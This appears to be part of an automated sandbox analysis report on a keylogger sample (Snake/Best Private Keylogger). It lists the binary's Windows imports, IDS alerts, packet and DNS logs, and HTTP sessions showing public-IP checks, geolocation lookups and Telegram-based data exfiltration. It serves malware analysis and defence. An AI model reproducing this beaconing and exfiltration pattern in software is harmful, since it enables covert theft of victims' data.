                                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                              UxTheme.dllIsThemeActive
                                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                              DescriptionData
                                                                                              Translation0x0809 0x04b0
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishGreat Britain

                                                                                              Download Network PCAP: filteredfull

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-03-17T11:09:40.070606+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249161132.226.247.7380TCP
                                                                                              2025-03-17T11:09:46.217032+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249161132.226.247.7380TCP
                                                                                              2025-03-17T11:09:46.712421+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.2249163149.154.167.220443TCP
                                                                                              2025-03-17T11:09:46.968357+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.2249163149.154.167.220443TCP
                                                                                              • Total Packets: 32
                                                                                              • 443 (HTTPS)
                                                                                              • 80 (HTTP)
                                                                                              • 53 (DNS)
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 17, 2025 11:09:38.940457106 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:38.945120096 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:38.945218086 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:38.946794033 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:38.951463938 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.618871927 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.647978067 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:39.652802944 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.854804039 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.873298883 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:39.873342991 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.873430014 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:39.877861023 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:39.877876043 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.070605993 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:40.071459055 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.071564913 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:40.349121094 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.349235058 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:40.354361057 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:40.354374886 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.354840040 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.425414085 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:40.472326040 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.533129930 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.533196926 CET44349162104.21.112.1192.168.2.22
                                                                                              Mar 17, 2025 11:09:40.533252954 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:40.535520077 CET49162443192.168.2.22104.21.112.1
                                                                                              Mar 17, 2025 11:09:45.811121941 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:45.815870047 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.019241095 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.031341076 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.031382084 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.031451941 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.032159090 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.032167912 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.217031956 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:09:46.648231983 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.648319006 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.656245947 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.656253099 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.656554937 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.667249918 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.712316036 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.712362051 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.712368011 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.968339920 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.968430042 CET44349163149.154.167.220192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.968467951 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:09:46.969052076 CET49163443192.168.2.22149.154.167.220
                                                                                              Mar 17, 2025 11:10:51.019860983 CET8049161132.226.247.73192.168.2.22
                                                                                              Mar 17, 2025 11:10:51.019937038 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:11:20.551553011 CET4916180192.168.2.22132.226.247.73
                                                                                              Mar 17, 2025 11:11:20.556348085 CET8049161132.226.247.73192.168.2.22
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 17, 2025 11:09:37.756031990 CET5456253192.168.2.228.8.8.8
                                                                                              Mar 17, 2025 11:09:37.764164925 CET53545628.8.8.8192.168.2.22
                                                                                              Mar 17, 2025 11:09:37.839934111 CET5456253192.168.2.228.8.8.8
                                                                                              Mar 17, 2025 11:09:37.846168995 CET53545628.8.8.8192.168.2.22
                                                                                              Mar 17, 2025 11:09:38.928704977 CET5291753192.168.2.228.8.8.8
                                                                                              Mar 17, 2025 11:09:38.934889078 CET53529178.8.8.8192.168.2.22
                                                                                              Mar 17, 2025 11:09:39.862629890 CET6275153192.168.2.228.8.8.8
                                                                                              Mar 17, 2025 11:09:39.872725964 CET53627518.8.8.8192.168.2.22
                                                                                              Mar 17, 2025 11:09:46.024574041 CET5789353192.168.2.228.8.8.8
                                                                                              Mar 17, 2025 11:09:46.030904055 CET53578938.8.8.8192.168.2.22
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Mar 17, 2025 11:09:37.756031990 CET192.168.2.228.8.8.80x24b8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.839934111 CET192.168.2.228.8.8.80x24b8Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.928704977 CET192.168.2.228.8.8.80x47f3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.862629890 CET192.168.2.228.8.8.80xf83fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:46.024574041 CET192.168.2.228.8.8.80xb9d3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.764164925 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:37.846168995 CET8.8.8.8192.168.2.220x24b8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:38.934889078 CET8.8.8.8192.168.2.220x47f3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:39.872725964 CET8.8.8.8192.168.2.220xf83fNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2025 11:09:46.030904055 CET8.8.8.8192.168.2.220xb9d3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                              • reallyfreegeoip.org
                                                                                              • api.telegram.org
                                                                                              • checkip.dyndns.org
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249161132.226.247.73803720C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Mar 17, 2025 11:09:38.946794033 CET151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Mar 17, 2025 11:09:39.618871927 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:39.647978067 CET127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Mar 17, 2025 11:09:39.854804039 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:40.071459055 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:39 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                              Mar 17, 2025 11:09:45.811121941 CET127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Mar 17, 2025 11:09:46.019241095 CET273INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:45 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 104
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.2249162104.21.112.14433720C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-03-17 10:09:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2025-03-17 10:09:40 UTC857INHTTP/1.1 200 OK
                                                                                              Date: Mon, 17 Mar 2025 10:09:40 GMT
                                                                                              Content-Type: text/xml
                                                                                              Content-Length: 362
                                                                                              Connection: close
                                                                                              Age: 57494
                                                                                              Cache-Control: max-age=31536000
                                                                                              cf-cache-status: HIT
                                                                                              last-modified: Sun, 16 Mar 2025 18:11:25 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiGpqrTp3jPLrynXxjd%2BYWQGOKiMahvGegLoOlnKG%2BsSlkVR8L2J6IOx8JDo6Ag5uswJ5j2211%2BZzlJVySwIomgC6AsFc%2F7C8nX6teKvzuJDg4N1B4yGxwOuJ1VyhLSExI%2FjIPZ9"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 921bb233f85042bc-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1578&rtt_var=598&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=223&unsent_bytes=0&cid=37061e3bae2beda6&ts=195&x=0"
